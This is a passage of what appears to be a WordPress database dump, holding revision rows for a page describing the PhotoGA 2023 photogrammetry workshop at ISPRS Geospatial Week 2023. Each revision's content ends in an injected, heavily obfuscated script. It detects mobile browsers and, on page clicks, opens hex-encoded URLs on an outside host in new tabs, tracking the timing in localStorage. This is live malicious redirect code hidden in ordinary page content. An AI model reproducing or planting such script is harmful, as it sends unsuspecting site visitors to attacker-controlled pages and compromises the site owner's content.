function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Photogrammetric 3D Reconstruction for Geo-Applications (PhotoGA 2023)','','inherit','closed','closed','','3449-revision-v1','','','2022-12-16 14:02:03','2022-12-16 14:02:03','',3449,'https://gsw2023.com/?p=3472',0,'revision','',0),
(3473,1,'2022-12-16 14:02:48','2022-12-16 14:02:48','<p>[vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: justify;\">This workshop focuses on algorithms and approaches for photogrammetric 3D reconstruction in the context of geospatial applications. The workshop addresses experts from photogrammetry, remote sensing, and computer vision fields in both academia and industry. Contributions are invited from all researchers and practitioners to cover the following core topics: models and methods for image orientation, multi-source data alignment and fusion, 3D data acquisition and surface reconstruction, image sequence analysis, multi-view geometry, and structure-from-motion (SfM) for data acquired from terrestrial, drone, airborne and spaceborne platforms, as well as the geo-applications of these methods.</h5>\n<h5>The workshop will be part of the ISPRS Geospatial Week 2023 hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"3465\" img_size=\"1200x1000\" alignment=\"center\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><strong>CHAIRS</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"63\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Photogrammetric 3D Reconstruction for Geo-Applications (PhotoGA 2023)','','inherit','closed','closed','','3449-revision-v1','','','2022-12-16 14:02:48','2022-12-16 14:02:48','',3449,'https://gsw2023.com/?p=3473',0,'revision','',0),
(3474,1,'2022-12-16 14:03:11','2022-12-16 14:03:11','<p>[vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: justify;\">This workshop focuses on algorithms and approaches for photogrammetric 3D reconstruction in the context of geospatial applications. The workshop addresses experts from photogrammetry, remote sensing, and computer vision fields in both academia and industry. Contributions are invited from all researchers and practitioners to cover the following core topics: models and methods for image orientation, multi-source data alignment and fusion, 3D data acquisition and surface reconstruction, image sequence analysis, multi-view geometry, and structure-from-motion (SfM) for data acquired from terrestrial, drone, airborne and spaceborne platforms, as well as the geo-applications of these methods.</h5>\n<h5>The workshop will be part of the ISPRS Geospatial Week 2023 hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"3465\" img_size=\"1200x1000\" alignment=\"center\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><strong>CHAIRS</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"63\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v 